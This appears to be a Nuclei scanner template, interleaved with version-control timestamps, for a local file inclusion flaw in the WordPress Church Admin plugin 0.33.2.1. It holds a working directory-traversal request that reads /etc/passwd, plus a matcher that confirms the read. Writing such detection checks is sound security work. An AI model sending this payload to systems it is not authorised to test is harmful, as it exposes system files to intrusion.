2021-09-28 10:08:03 +00:00
id : church-admin-lfi
2021-09-28 00:31:37 +00:00
info :
2022-08-05 13:57:51 +00:00
name : WordPress Church Admin 0.33.2.1 - Local File Inclusion
2021-09-28 00:31:37 +00:00
author : 0x_Akoko
severity : high
2022-08-05 13:57:51 +00:00
description : WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php.
2021-09-28 10:08:03 +00:00
reference :
- https://wpscan.com/vulnerability/8997
- https://id.wordpress.org/plugins/church-admin/
2022-08-05 13:57:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2021-09-28 00:31:37 +00:00
tags : wordpress,wp-plugin,lfi
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2022-08-05 13:57:51 +00:00
# Enhanced by mp on 2022/08/05